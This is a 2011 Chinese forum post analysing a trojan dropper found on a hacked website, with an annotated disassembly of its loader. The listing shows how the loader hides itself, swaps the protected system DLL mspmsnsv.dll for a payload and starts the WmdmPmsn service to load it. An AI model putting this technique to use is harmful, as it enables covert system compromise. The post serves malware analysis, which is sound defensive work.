是昔流芳
发表于 2011-2-14 18:57
今天手贱,看到个网站被挂马了,于是就把网马下载下来捏一捏.一开始分析的时候还挺怡然,分析到生成的DLL时就有些烦躁了.一看时间戳,09年11月的.运气真不是一般的好.把EXE部分的分析发上来吧,不多,半成品,勿笑.得赶作业去了......
Loader(EXE 释放器)部分分析 —— 入口函数 004012B2,注释中对 MoveFile/MoveFileEx 一段的理解见代码内说明:
; sub_4012B2 (004012B2-004014A8): loader entry. Moves itself into %TEMP%,
; schedules that copy for deletion at reboot, renames the system's
; mspmsnsv.dll aside as "Thumbes.db", writes an embedded payload over the
; mspmsnsv.dll path, then creates and starts the "WmdmPmsn" service
; (original annotations: the service host ends up loading the replaced DLL).
;
; Stack frame is 0x71C bytes; the buffers below are each 260 bytes (MAX_PATH),
; cleared as: 1 byte via `and`, 0x40 dwords (256 B) via rep stos, then a word
; and a byte = 260 B.
;   [ebp-514]  own executable path     (GetModuleFileNameA)
;   [ebp-410]  %TEMP% directory        (GetTempPathA)
;   [ebp-208]  %TEMP%<tickcount>.dat   (sprintf "%s%d.dat")
;   [ebp-104]  <sysdir>\mspmsnsv.dll
;   [ebp-618]  <sysdir>                (filled, not referenced again here)
;   [ebp-71C]  <sysdir>\notepad.exe
;   [ebp-30C]  <sysdir>\Thumbes.db     (where the original DLL is moved)
; esi = 0x104 (260) is used as BufSize for every path API call.
;
; Helpers sub_401000, sub_40118E, sub_401042, sub_40125A, sub_4010C2,
; sub_40120F and sub_4011D3 are NOT in this listing; their roles below are the
; original analyst's annotations and should be confirmed against their bodies.
004012B2 /$ 55 push ebp
004012B3 |. 8BEC mov ebp, esp
004012B5 |. 81EC 1C070000 sub esp, 71C ; 0x71C-byte frame for the path buffers above
; --- zero [ebp-514] (own path), 260 bytes ---
004012BB |. 80A5 ECFAFFFF>and byte ptr [ebp-514], 0
004012C2 |. 53 push ebx
004012C3 |. 56 push esi
004012C4 |. 57 push edi
004012C5 |. 6A 40 push 40
004012C7 |. 33C0 xor eax, eax
004012C9 |. 59 pop ecx ; ecx = 0x40 dwords = 256 bytes
004012CA |. 8DBD EDFAFFFF lea edi, dword ptr [ebp-513]
004012D0 |. F3:AB rep stos dword ptr es:[edi]
; --- zero [ebp-410] (%TEMP% dir); the stos word/byte below finish the previous buffer ---
004012D2 |. 80A5 F0FBFFFF>and byte ptr [ebp-410], 0
004012D9 |. 6A 40 push 40
004012DB |. 66:AB stos word ptr es:[edi]
004012DD |. AA stos byte ptr es:[edi]
004012DE |. 59 pop ecx
004012DF |. 33C0 xor eax, eax
004012E1 |. 8DBD F1FBFFFF lea edi, dword ptr [ebp-40F]
; --- zero [ebp-208] (%TEMP%\<tick>.dat) ---
004012E7 |. 80A5 F8FDFFFF>and byte ptr [ebp-208], 0
004012EE |. F3:AB rep stos dword ptr es:[edi]
004012F0 |. 66:AB stos word ptr es:[edi]
004012F2 |. AA stos byte ptr es:[edi]
004012F3 |. 6A 40 push 40
004012F5 |. 33C0 xor eax, eax
004012F7 |. 59 pop ecx
004012F8 |. 8DBD F9FDFFFF lea edi, dword ptr [ebp-207]
004012FE |. F3:AB rep stos dword ptr es:[edi]
00401300 |. 66:AB stos word ptr es:[edi]
00401302 |. AA stos byte ptr es:[edi]
; --- build %TEMP%\<GetTickCount>.dat ---
00401303 |. 8D85 F0FBFFFF lea eax, dword ptr [ebp-410]
00401309 |. BE 04010000 mov esi, 104 ; esi = 260 = MAX_PATH, reused as BufSize below
0040130E |. 50 push eax ; /Buffer
0040130F |. 56 push esi ; |BufSize => 104 (260.)
00401310 |. FF15 54204000 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA: %TEMP% directory (trailing backslash included by the API)
00401316 |. FF15 50204000 call dword ptr [<&KERNEL32.GetTickCou>; [GetTickCount -> the numeric part of the file name, so it differs on every run
0040131C |. 50 push eax ; /<%d>
0040131D |. 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; |
00401323 |. 50 push eax ; |<%s>
00401324 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; |
0040132A |. 68 5C5A4000 push 00405A5C ; |format = "%s%d.dat"
0040132F |. 50 push eax ; |s
00401330 |. FF15 70204000 call dword ptr [<&MSVCRT.sprintf>] ; \sprintf([ebp-208], "%s%d.dat", tempdir, tick); no bound check, but both inputs are <= 260 bytes
00401336 |. 83C4 10 add esp, 10 ; cdecl: 4 args
; --- move own EXE to %TEMP%\<tick>.dat ---
00401339 |. 8D85 ECFAFFFF lea eax, dword ptr [ebp-514]
0040133F |. 56 push esi ; /BufSize
00401340 |. 50 push eax ; |PathBuffer
00401341 |. 6A 00 push 0 ; |hModule = NULL
00401343 |. FF15 4C204000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA(NULL): full path of this executable (not just its directory)
00401349 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040134F |. 50 push eax ; /NewName
00401350 |. 8D85 ECFAFFFF lea eax, dword ptr [ebp-514] ; |
00401356 |. 50 push eax ; |ExistingName
00401357 |. FF15 48204000 call dword ptr [<&KERNEL32.MoveFileA>>; \MoveFileA(own path -> %TEMP%\<tick>.dat): a MOVE, not a copy -- the EXE vanishes from where it was launched. The analyst observed 1634560.dat; the number is the tick count and varies
0040135D |. 85C0 test eax, eax
0040135F |. 74 11 je short 00401372 ; MoveFileA returns 0 on FAILURE -> skip the MoveFileEx; on success fall through (the original note had this inverted)
00401361 |. 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
00401363 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; |
00401369 |. 6A 00 push 0 ; |NewName = NULL
0040136B |. 50 push eax ; |ExistingName
0040136C |. FF15 44204000 call dword ptr [<&KERNEL32.MoveFileEx>; \MoveFileExA(.dat, NULL, MOVEFILE_DELAY_UNTIL_REBOOT): per the API docs a NULL new name with this flag schedules DELETION of the file at next reboot, i.e. self-removal of the dropper -- not "copy itself after reboot". Forensic note: the .dat persists in %TEMP% only until the next boot
; --- prepare service / library name strings ---
00401372 |> \BB 245A4000 mov ebx, 00405A24 ; ASCII "WmdmPmsn" ; ebx = service name, kept for the calls at 00401437/00401496/0040149C
00401377 |. 6A 08 push 8 ; len("WmdmPmsn")
00401379 |. 53 push ebx
0040137A |. E8 81FCFFFF call 00401000 ; sub_401000(str, len) -- not shown; presumably an in-place decode/transform of the string, confirm
0040137F |. 6A 0C push 0C ; len("ADVAPI32.dll")
00401381 |. 68 145A4000 push 00405A14 ; ASCII "ADVAPI32.dll"
00401386 |. E8 75FCFFFF call 00401000 ; same helper on "ADVAPI32.dll"
; --- zero [ebp-104], [ebp-30C], [ebp-618] (260 bytes each) ---
0040138B |. 80A5 FCFEFFFF>and byte ptr [ebp-104], 0
00401392 |. 83C4 10 add esp, 10 ; cdecl cleanup for the two sub_401000 calls (2 args each)
00401395 |. 33C0 xor eax, eax
00401397 |. 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
0040139D |. 6A 40 push 40
0040139F |. 80A5 F4FCFFFF>and byte ptr [ebp-30C], 0
004013A6 |. 59 pop ecx
004013A7 |. 80A5 E8F9FFFF>and byte ptr [ebp-618], 0
004013AE |. F3:AB rep stos dword ptr es:[edi]
004013B0 |. 66:AB stos word ptr es:[edi]
004013B2 |. AA stos byte ptr es:[edi]
004013B3 |. 6A 40 push 40
004013B5 |. 33C0 xor eax, eax
004013B7 |. 59 pop ecx
004013B8 |. 8DBD F5FCFFFF lea edi, dword ptr [ebp-30B]
004013BE |. F3:AB rep stos dword ptr es:[edi]
004013C0 |. 66:AB stos word ptr es:[edi]
004013C2 |. AA stos byte ptr es:[edi]
004013C3 |. 6A 40 push 40
004013C5 |. 33C0 xor eax, eax
004013C7 |. 59 pop ecx
004013C8 |. 8DBD E9F9FFFF lea edi, dword ptr [ebp-617]
004013CE |. F3:AB rep stos dword ptr es:[edi]
004013D0 |. 66:AB stos word ptr es:[edi]
004013D2 |. AA stos byte ptr es:[edi]
; --- build the three <sysdir>\... paths ---
004013D3 |. 8B3D 40204000 mov edi, dword ptr [<&KERNEL32.GetSy>; kernel32.GetSystemDirectoryA, cached in edi for four calls
004013D9 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004013DF |. 56 push esi ; /BufSize
004013E0 |. 50 push eax ; |Buffer
004013E1 |. FFD7 call edi ; \GetSystemDirectoryA -> [ebp-104]
004013E3 |. 8D85 E8F9FFFF lea eax, dword ptr [ebp-618]
004013E9 |. 56 push esi ; /BufSize
004013EA |. 50 push eax ; |Buffer
004013EB |. FFD7 call edi ; \GetSystemDirectoryA -> [ebp-618] (this buffer is not used again in the listing)
004013ED |. 8D85 E4F8FFFF lea eax, dword ptr [ebp-71C]
004013F3 |. 56 push esi ; /BufSize
004013F4 |. 50 push eax ; |Buffer
004013F5 |. FFD7 call edi ; \GetSystemDirectoryA -> [ebp-71C]
004013F7 |. 8D85 E4F8FFFF lea eax, dword ptr [ebp-71C]
004013FD |. 68 4C5A4000 push 00405A4C ; /src = "\notepad.exe"
00401402 |. 50 push eax ; |dest
00401403 |. E8 BE000000 call <jmp.&MSVCRT.strcat> ; \[ebp-71C] = <sysdir>\notepad.exe (unbounded strcat; sysdir is <= 260 bytes so it fits)
00401408 |. 59 pop ecx ; cdecl cleanup, arg 1
00401409 |. 8D85 F4FCFFFF lea eax, dword ptr [ebp-30C]
0040140F |. 59 pop ecx ; cdecl cleanup, arg 2
00401410 |. 56 push esi
00401411 |. 50 push eax
00401412 |. FFD7 call edi ; GetSystemDirectoryA -> [ebp-30C]
00401414 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
0040141A |. 68 3C5A4000 push 00405A3C ; /src = "\mspmsnsv.dll"
0040141F |. 50 push eax ; |dest
00401420 |. E8 A1000000 call <jmp.&MSVCRT.strcat> ; \[ebp-104] = <sysdir>\mspmsnsv.dll -- the system DLL that gets replaced
00401425 |. 8D85 F4FCFFFF lea eax, dword ptr [ebp-30C]
0040142B |. 68 305A4000 push 00405A30 ; /src = "\Thumbes.db"
00401430 |. 50 push eax ; |dest
00401431 |. E8 90000000 call <jmp.&MSVCRT.strcat> ; \[ebp-30C] = <sysdir>\Thumbes.db (note the misspelling "Thumbes", a usable IOC)
; --- stop/open existing service, then replace the DLL ---
00401436 |. 53 push ebx
00401437 |. E8 52FDFFFF call 0040118E ; sub_40118E("WmdmPmsn") -- original note: opens the Service Control Manager; presumably stops/queries the existing service so its DLL can be replaced, confirm
0040143C |. 83C4 14 add esp, 14 ; 5 dwords: two strcat calls (2 args each) + the push ebx above
0040143F |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00401444 |. FF15 3C204000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep(1 s) -- likely waiting for the service to stop before touching its DLL
0040144A |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401450 |. 50 push eax
00401451 |. E8 ECFBFFFF call 00401042 ; sub_401042(<sysdir>\mspmsnsv.dll) -- original note: string handling, loads sfc_os.dll and calls its ordinal #5. NOTE(review): sfc_os.dll ordinal 5 is commonly identified as SfcFileException, used to exempt a file from Windows File Protection so a protected system DLL can be overwritten -- confirm in sub_401042
00401456 |. 59 pop ecx
00401457 |. 8D85 F4FCFFFF lea eax, dword ptr [ebp-30C]
0040145D |. 50 push eax ; /NewName
0040145E |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104] ; |
00401464 |. 50 push eax ; |ExistingName
00401465 |. FF15 48204000 call dword ptr [<&KERNEL32.MoveFileA>>; \MoveFileA(mspmsnsv.dll -> Thumbes.db): renames the genuine DLL aside (a move, so the original name is now free); Thumbes.db is the clean copy for recovery
0040146B |. FF35 00304000 push dword ptr [403000] ; arg 3: dword at 00403000 -- looks like the payload size, confirm
00401471 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401477 |. 68 04304000 push 00403004 ; arg 2: pointer to 00403004 -- looks like the embedded payload DLL body, confirm
0040147C |. 50 push eax ; arg 1: <sysdir>\mspmsnsv.dll
0040147D |. E8 D8FDFFFF call 0040125A ; sub_40125A(path, data, size) -- original note: CreateFile-based write that drops the payload over mspmsnsv.dll
00401482 |. 8D85 E4F8FFFF lea eax, dword ptr [ebp-71C]
00401488 |. 50 push eax ; arg 2: <sysdir>\notepad.exe
00401489 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
0040148F |. 50 push eax ; arg 1: <sysdir>\mspmsnsv.dll
00401490 |. E8 2DFCFFFF call 004010C2 ; sub_4010C2(dll path, notepad path) -- original note: opens both files; purpose not shown (possibly patches the notepad path into the dropped DLL), confirm
; --- create and start the service ---
00401495 |. 53 push ebx
00401495 |. 53 push ebx ; NOTE(review): duplicated line in the paste -- same address 00401495, one-byte opcode, next instruction at 00401496, and the `add esp, 1C` below only accounts for one push here. Treat as a single push
00401496 |. E8 74FDFFFF call 0040120F ; sub_40120F("WmdmPmsn") -- original note: creates the service and sets it to start; the service's binary is what now loads the replaced DLL
0040149B |. 53 push ebx
0040149C |. E8 32FDFFFF call 004011D3 ; sub_4011D3("WmdmPmsn") -- original note: starts the service
004014A1 |. 83C4 1C add esp, 1C ; 7 dwords: sub_40125A (3) + sub_4010C2 (2) + one push ebx each for sub_40120F and sub_4011D3
004014A4 |. 5F pop edi
004014A5 |. 5E pop esi
004014A6 |. 5B pop ebx
004014A7 |. C9 leave
004014A8 \. C3 retn
后面被写到 mspmsnsv.dll 位置、由 WmdmPmsn 服务加载的那个 DLL 会注入 notepad.exe 然后下载其它木马;时间紧(马上开学了,你懂的),就没详细分析.